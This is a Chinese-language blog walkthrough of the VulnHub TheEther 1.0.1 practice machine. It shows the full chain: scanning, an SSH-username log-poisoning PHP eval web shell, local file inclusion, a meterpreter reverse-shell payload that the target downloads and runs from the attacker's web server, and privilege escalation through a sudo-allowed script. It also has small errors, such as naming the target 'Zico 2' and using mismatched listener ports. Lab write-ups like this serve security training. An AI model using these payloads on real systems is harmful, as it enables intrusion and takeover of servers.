Vulhub TheEther_1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/theether/theEther_1.0.1.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知theEther的一个ip地址为192.168.47.164

扫描Zico 2的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.164

发现开放22,80端口

目录扫描

plain 复制代码
dirb http://192.168.47.164

访问网站获取敏感信息

在About us这里疑似存在文件包含漏洞

由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权

尝试拼接默认目录 -> /var/log/auth.log路径无法访问,存在报错

尝试利用ssh登录报错注入进错误访问日志中

plain 复制代码
ssh "<?php eval($_GET[cmd]);?>"@192.168.47.164

尝试burp抓包,查看数据包信息

发送到Repeater模块,拼接日志路径

获取shell

拼接命令

plain 复制代码
&d1no

打开kali,利用msf生成shell -> 同时打开msf的内部监听

plain 复制代码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.47.129 LPORT=4444 -f elf > shell.elf
plain 复制代码
msfconsole
 
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.47.129
set lport 7272

新启一个http临时服务,让靶机远程下载shell.elf文件

plain 复制代码
python -m http.server 2429
plain 复制代码
/?file=/var/log/auth.log&d1no=system('wget+192.168.47.129:2429/shell.elf');
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf');
/?file=/var/log/auth.log&d1no=system('./shell.elf');

监听成功

提权

获得可交互式shell

plain 复制代码
shell
python -c 'import pty;pty.spawn("/bin/bash")'

查看可利用提权

plain 复制代码
sudo -l
plain 复制代码
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

提权成功

相关推荐
信创天地1 小时前
深耕金融政务核心场景:国产化数据库迁移的全流程架构设计与风险管控
运维·网络安全·系统架构·系统安全·运维开发
蜂蜜黄油呀土豆4 小时前
计算机网络中的常见网络场景与问题排查
tcp/ip·计算机网络·网络安全·http请求与响应
bleach-7 小时前
buuctf系列解题思路祥讲--[SUCTF 2019]CheckIn1--文件上传以及user.ini的应用
nginx·web安全·网络安全·php
视觉&物联智能7 小时前
【杂谈】-人工智能在风险管理中的应用:愿景与现实的差距
人工智能·网络安全·ai·aigc·agi
Bruce_Liuxiaowei7 小时前
内网探测常用技术方法整理
网络·安全·网络安全
小李独爱秋8 小时前
计算机网络经典问题透视:MD5报文是什么?有什么特点?
网络·网络协议·计算机网络·网络安全·信息与通信·信号处理
南行*8 小时前
C语言Linux环境编程
linux·c语言·开发语言·网络安全
南行*9 小时前
MSF安全开发
安全·网络安全·系统安全·ruby
Whoami!12 小时前
❿⁄₇ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击 ➱ 提取密码管理器KeePass主密码(下)
网络安全·信息安全·哈希算法·密码破解·keepass
沈浩(种子思维作者)17 小时前
真的能精准医疗吗?癌症能提前发现吗?
人工智能·python·网络安全·健康医疗·量子计算